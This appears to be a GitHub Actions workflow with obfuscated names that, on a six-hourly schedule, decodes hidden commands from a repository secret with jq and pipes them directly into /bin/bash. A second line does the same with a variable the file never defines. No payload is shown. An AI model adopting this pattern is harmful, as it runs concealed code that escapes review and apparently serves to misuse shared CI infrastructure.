name: weibushuang5678
on:
  workflow_dispatch:
  schedule:
    - cron: '56 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: weibushuang5678
        env:
          pvq017: ${{ secrets.pvq017 }}
        run: |
          echo $pvq017 | jq -r .dcqf5781 | /bin/bash
          echo $ds41633 | jq -r .cacpb813 | /bin/bash

